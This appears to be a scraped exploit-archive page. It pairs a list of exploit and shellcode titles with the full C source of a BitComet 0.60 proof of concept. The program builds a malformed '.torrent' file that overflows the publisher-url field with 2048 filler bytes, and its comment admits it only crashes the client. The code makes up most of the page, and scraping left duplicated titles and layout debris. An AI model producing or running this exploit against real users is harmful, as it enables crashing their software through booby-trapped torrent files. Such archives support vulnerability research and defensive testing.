880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
101 lines
No EOL
3.4 KiB
C
101 lines
No EOL
3.4 KiB
C
// source: https://www.securityfocus.com/bid/16311/info
|
|
|
|
BitComet is prone to a buffer-overflow vulnerability.
|
|
|
|
This issue presents itself when the application attempts to process a malformed '.torrent' file.
|
|
|
|
Exploitation of this issue could allow attacker-supplied machine code to be executed in the context of the affected application.
|
|
|
|
BitComet 0.60 is reportedly vulnerable. Other versions may be affected as well.
|
|
|
|
#include <windows.h>
|
|
#include <stdio.h>
|
|
|
|
/*
|
|
* .::[ BitComet URI Buffer Overflow ]::.
|
|
*
|
|
* A vulnerability in BitComet, allows remote attackers construct a special .torrent file and put
|
|
* it on any BitTorrent publishing web site. When a user downloads the .torrent file and clicks
|
|
* on publishers name, BitComet will crash. An attacker can run arbitrary code on victims' host
|
|
* by specially crafted .torrent file.
|
|
*
|
|
* .text:0056057B mov edx, [eax]
|
|
* .text:0056057D push 0
|
|
* .text:0056057F push esi
|
|
* .text:00560580 mov ecx, eax
|
|
* .text:00560582 call dword ptr [edx+9Ch] <--- bug occurs here
|
|
*
|
|
* [Credits]: Fortinet Research
|
|
* [Notes]: I could only do DoS because the EAX and ECX were only controlled, and were seperated by 0's.
|
|
*/
|
|
|
|
char bof[] =
|
|
"d8:announce15:http://test.com"
|
|
"7:comment4:1234"
|
|
"13:comment.utf-84:1234"
|
|
"10:created by13:BitComet/0.60"
|
|
"13:creation datei1137897500e"
|
|
"8:encoding5:UTF-84:info"
|
|
"d6:lengthi0e"
|
|
"4:name8:null.txt"
|
|
"10:name.utf-88:null.txt"
|
|
"12:piece lengthi32768e"
|
|
"6:pieces20:\xDA\x39\xA3\xEE\x5E\x6B\x4B\x0D\x32\x55\xBF\xEF\x95\x60\x18\x90\xAF\xD8\x07\x09"
|
|
"9:publisher4:test"
|
|
"13:publisher-url19:http://www.test.com"
|
|
"19:publisher-url.utf-8";
|
|
|
|
char eof[] =
|
|
"e5:nodesll15:213.112.235.171"
|
|
"i31225eel14:210.49.100.112"
|
|
"i32459eel14:61.229.130.217"
|
|
"i17550eel14:200.88.148.239"
|
|
"i61154eel14:222.84.178.235"
|
|
"i17581eel14:220.210.178.80"
|
|
"i11385eel12:218.7.239.78"
|
|
"i50468eel12:130.158.6.55"
|
|
"i62093eel13:219.68.237.54"
|
|
"i26034eel12:82.83.53.230"
|
|
"i7836eeee";
|
|
|
|
int main(int argc, char **argv) {
|
|
FILE *fp;
|
|
char buf[2048];
|
|
|
|
printf("+---=[ BitComet URI Buffer Overflow ]=---+\n");
|
|
printf("+---=[ Coded by DiGiTALSTAR ]=---+\n\n");
|
|
|
|
printf("Opening torrent for writing... ");
|
|
if (!(fp = fopen("comet.torrent", "w"))) {
|
|
printf("FAILED\n");
|
|
exit(-1);
|
|
}
|
|
printf("OK");
|
|
|
|
memset(buf, '\x41', sizeof(buf));
|
|
|
|
printf("Writing torrent data... ");
|
|
if (fwrite(bof, 1, sizeof(bof)-1, fp) <= 0) {
|
|
printf("FAILED\n");
|
|
exit(-1);
|
|
}
|
|
if (fprintf(fp, "%d:", sizeof(buf)) <= 0) {
|
|
printf("FAILED\n");
|
|
exit(-1);
|
|
}
|
|
if (fwrite(buf, 1, sizeof(buf), fp) <= 0) {
|
|
printf("FAILED\n");
|
|
exit(-1);
|
|
}
|
|
if (fwrite(eof, 1, sizeof(eof)-1, fp) <= 0) {
|
|
printf("FAILED\n");
|
|
exit(-1);
|
|
}
|
|
printf("DONE\n");
|
|
|
|
fclose(fp);
|
|
|
|
printf("Now open the torrent in bitcomet and click test\n");
|
|
|
|
return 0;
|
|
} |